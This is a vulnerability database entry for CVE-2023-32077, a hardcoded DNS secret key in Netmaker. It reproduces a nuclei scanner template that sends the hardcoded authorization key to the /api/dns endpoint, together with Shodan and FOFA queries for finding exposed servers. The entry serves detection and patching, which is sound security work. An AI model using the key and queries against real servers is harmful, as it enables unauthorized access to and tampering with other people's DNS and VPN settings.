Lucene search
K

Netmaker - Hardcoded DNS Secret Key

🗓️ 28 Jun 2026 15:08:32Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 37 Views

Netmaker hardcoded DNS key vulnerability, allowing unauth access to DNS API in versions 0.17.1 and 0.18.

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2023-32077
25 Aug 202302:13
circl
CNNVD
Gravitl Netmaker 信任管理问题漏洞
24 Aug 202300:00
cnnvd
CVE
CVE-2023-32077
24 Aug 202321:23
cve
Cvelist
CVE-2023-32077 Netmaker has Hardcoded DNS Secret Key
24 Aug 202321:23
cvelist
Github Security Blog
Netmaker has Hardcoded DNS Secret Key
25 Aug 202318:38
github
NVD
CVE-2023-32077
24 Aug 202322:15
nvd
OSV
CVE-2023-32077 Netmaker has Hardcoded DNS Secret Key
24 Aug 202321:23
osv
OSV
GHSA-8X8H-HCQ8-JWWX Netmaker has Hardcoded DNS Secret Key
25 Aug 202318:38
osv
OSV
GO-2023-2022 Netmaker has Hardcoded DNS Secret Key in github.com/gravitl/netmaker
21 Aug 202414:17
osv
Prion
Hardcoded credentials
24 Aug 202322:15
prion
Rows per page
id: CVE-2023-32077

info:
  name: Netmaker - Hardcoded DNS Secret Key
  author: iamnoooob,rootxharsh,pdresearch
  severity: high
  description: |
    Netmaker makes networks with WireGuard. Prior to versions 0.17.1 and 0.18.6, hardcoded DNS key usage has been found in Netmaker allowing unauth users to interact with DNS API endpoints.
  impact: |
    Unauthenticated attackers can access DNS API endpoints using the hardcoded secret key, potentially manipulating DNS configurations and redirecting WireGuard network traffic in the Netmaker VPN infrastructure.
  remediation: |
    Update Netmaker to version 0.17.1 or 0.18.6 or later that removes hardcoded credentials and implements proper authentication for DNS API endpoints.
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-32077
    cwe-id: CWE-798,CWE-321
    epss-score: 0.03147
    epss-percentile: 0.86312
    cpe: cpe:2.3:a:gravitl:netmaker:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: gravitl
    product: netmaker
    shodan-query:
      - html:"netmaker"
      - http.html:"netmaker"
    fofa-query: body="netmaker"
  tags: cve,cve2023,info-key,netmaker,exposure,gravitl,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/api/dns"

    headers:
      Authorization: "x secretkey"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(header, "application/json")'
          - 'contains_all(body, "{\"address\":", "\"network\":", "\"name\":")'
        condition: and
# digest: 490a0046304402202350f410303da8f616591ea418c6c59995da3b0a2f2bfffeda64294266cc40f802206ca40416b503e732b026bfa8857940ea195071c152d28be43562d171c634a026:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7High risk
Vulners AI Score7
CVSS 3.17.5
EPSS0.03147
SSVC
37